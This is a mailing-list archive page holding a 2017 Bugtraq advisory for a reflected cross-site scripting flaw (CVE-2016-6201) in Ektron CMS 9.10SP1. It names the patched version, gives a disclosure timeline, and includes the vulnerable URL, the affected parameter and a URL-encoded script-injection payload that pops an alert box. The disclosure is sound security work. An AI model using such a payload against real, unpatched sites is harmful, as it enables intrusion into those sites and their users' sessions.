| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 19 Jun 2017 06:11:47 GMT From: ghasseminia@...il.com To: bugtraq@...urityfocus.com Subject: Ektron Version 9.10SP1(Build 9.1.0.184) Cross Site Scripting # Vulnerability type: Cross Site Scripting # Vendor: Ektron # Product: Ektron Content Management System # Affected version: 9.10SP1(Build 9.1.0.184) # Patched version: 9.1.0.184SP3(9.1.0.184.3.127) # Credit: Siyavash Ghasseminia # CVE ID: CVE-2016-6201 # PROOF OF CONCEPT Vulnerable URL: /WorkArea/content.aspx?id=0&action=ViewContentByCategory&LangType=1033&ContType=zjgsa&SubType=0 # VULNERABLE PARAMETERS: - ContType # SAMPLE PAYLOAD - %22%3E%3Cscript%3Ealert(1234567890)%3C%2fscript%3Eumarp # TIMELINE - 1/7/2016: Vulnerability found - 4/7/2016: Vendor informed - 13/7/2016: Vendor responded and acknowledged - 29/7/2016: Vendor fixed the issue - 19/6/2017: Public disclosure
Powered by blists - more mailing lists